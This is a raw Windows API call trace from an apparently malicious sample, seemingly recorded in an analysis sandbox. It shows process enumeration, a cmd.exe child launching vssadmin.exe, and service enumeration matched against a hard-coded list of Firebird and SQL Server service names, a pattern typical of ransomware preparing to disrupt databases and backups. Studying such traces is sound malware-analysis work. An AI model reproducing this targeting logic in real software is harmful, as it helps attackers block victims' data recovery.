	[0039.856] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0039.856] lstrlenW (lpString="tumormanual.exe") returned 15
	[0039.856] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0039.857] lstrlenW (lpString="telecom.exe") returned 11
	[0039.857] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0039.857] lstrlenW (lpString="realistic.exe") returned 13
	[0039.857] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0039.858] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0039.858] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0039.858] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0039.858] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0039.859] lstrlenW (lpString="cmd.exe") returned 7
	[0039.859] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0039.859] lstrlenW (lpString="conhost.exe") returned 11
	[0039.859] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0039.859] lstrlenW (lpString="vssadmin.exe") returned 12
	[0039.860] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0039.860] lstrlenW (lpString="VSSVC.exe") returned 9
	[0039.860] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0
	[0039.860] CloseHandle (hObject=0x184) returned 1
	[0039.860] Sleep (dwMilliseconds=0x1f4) 
	[0040.709] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fce8
	[0040.709] EnumServicesStatusExW (in: hSCManager=0x7e0fce8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0040.710] GetLastError () returned 0xea
	[0040.710] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x123e) returned 0x7e5ca88
	[0040.710] EnumServicesStatusExW (in: hSCManager=0x7e0fce8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7e5ca88, cbBufSize=0x123e, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7e5ca88, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0040.710] CloseServiceHandle (hSCObject=0x7e0fce8) returned 1
	[0040.710] lstrlenW (lpString="Appinfo") returned 7
	[0040.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0040.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0040.710] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0040.711] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0040.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0040.711] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0040.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0040.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0040.711] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0040.711] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0040.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0040.711] lstrlenW (lpString="AudioSrv") returned 8
	[0040.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0040.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0040.711] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0040.711] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0040.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0040.711] lstrlenW (lpString="BFE") returned 3
	[0040.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0040.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0040.711] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0040.711] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0040.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0040.711] lstrlenW (lpString="CryptSvc") returned 8
	[0040.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0040.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0040.711] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0040.711] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0040.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0040.711] lstrlenW (lpString="CscService") returned 10
	[0040.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0040.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0040.711] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0040.711] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0040.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0040.711] lstrlenW (lpString="DcomLaunch") returned 10
	[0040.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0040.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0040.712] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0040.712] lstrlenW (lpString="Dhcp") returned 4
	[0040.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0040.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0040.712] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0040.712] lstrlenW (lpString="Dnscache") returned 8
	[0040.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0040.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0040.712] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0040.712] lstrlenW (lpString="DPS") returned 3
	[0040.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0040.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0040.712] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0040.712] lstrlenW (lpString="eventlog") returned 8
	[0040.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0040.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0040.712] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0040.712] lstrlenW (lpString="EventSystem") returned 11
	[0040.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0040.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0040.712] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0040.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0040.712] lstrlenW (lpString="gpsvc") returned 5
	[0040.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0040.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0040.713] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0040.713] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0040.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0040.713] lstrlenW (lpString="iphlpsvc") returned 8
	[0040.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0040.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0040.713] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0040.713] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0040.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0040.713] lstrlenW (lpString="LanmanServer") returned 12
	[0040.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0040.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0040.713] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0040.713] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0040.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0040.713] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0040.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0040.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0040.713] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0040.713] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0040.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0040.713] lstrlenW (lpString="lmhosts") returned 7
	[0040.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0040.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0040.713] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0040.713] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0040.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0040.713] lstrlenW (lpString="MMCSS") returned 5
	[0040.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0040.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0040.713] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0040.713] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0040.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0040.714] lstrlenW (lpString="MpsSvc") returned 6
	[0040.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0040.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0040.714] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0040.714] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0040.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0040.714] lstrlenW (lpString="Netman") returned 6
	[0040.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0040.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0040.714] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0040.714] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0040.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0040.714] lstrlenW (lpString="netprofm") returned 8
	[0040.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0040.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0040.714] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0040.714] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0040.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0040.714] lstrlenW (lpString="NlaSvc") returned 6
	[0040.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0040.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0040.714] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0040.714] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0040.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0040.714] lstrlenW (lpString="nsi") returned 3
	[0040.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0040.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0040.714] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0040.714] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0040.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0040.714] lstrlenW (lpString="PcaSvc") returned 6
	[0040.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0040.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0040.714] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0040.714] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0040.715] lstrlenW (lpString="PlugPlay") returned 8
	[0040.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0040.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0040.715] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0040.715] lstrlenW (lpString="Power") returned 5
	[0040.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0040.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0040.715] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0040.715] lstrlenW (lpString="ProfSvc") returned 7
	[0040.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0040.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0040.715] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0040.715] lstrlenW (lpString="RpcEptMapper") returned 12
	[0040.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0040.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0040.715] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0040.715] lstrlenW (lpString="RpcSs") returned 5
	[0040.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0040.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0040.715] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0040.715] lstrlenW (lpString="SamSs") returned 5
	[0040.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0040.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0040.715] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0040.716] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0040.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0040.716] lstrlenW (lpString="Schedule") returned 8
	[0040.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0040.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0040.716] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0040.716] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0040.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0040.716] lstrlenW (lpString="SENS") returned 4
	[0040.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0040.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0040.716] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0040.716] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0040.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0040.716] lstrlenW (lpString="ShellHWDetection") returned 16
	[0040.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0040.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0040.716] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0040.716] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0040.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0040.716] lstrlenW (lpString="Spooler") returned 7
	[0040.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0040.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0040.716] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0040.716] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0040.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0040.716] lstrlenW (lpString="SysMain") returned 7
	[0040.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0040.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0040.716] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0040.716] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0040.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0040.716] lstrlenW (lpString="Themes") returned 6
	[0040.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0040.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0040.717] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0040.717] lstrlenW (lpString="TrkWks") returned 6
	[0040.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0040.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0040.717] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0040.717] lstrlenW (lpString="UxSms") returned 5
	[0040.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0040.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0040.717] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0040.717] lstrlenW (lpString="VSS") returned 3
	[0040.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0040.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0040.717] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0040.717] lstrlenW (lpString="WdiServiceHost") returned 14
	[0040.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0040.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0040.717] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0040.717] lstrlenW (lpString="WdiSystemHost") returned 13
	[0040.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0040.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0040.717] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0040.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0040.717] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0040.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0040.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0040.718] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0040.718] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0040.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0040.718] lstrlenW (lpString="Winmgmt") returned 7
	[0040.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0040.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0040.718] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0040.718] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0040.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0040.718] lstrlenW (lpString="WPDBusEnum") returned 10
	[0040.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0040.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0040.718] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0040.718] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0040.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0040.718] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e5ca88 | out: hHeap=0x7d60000) returned 1
	[0040.718] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4
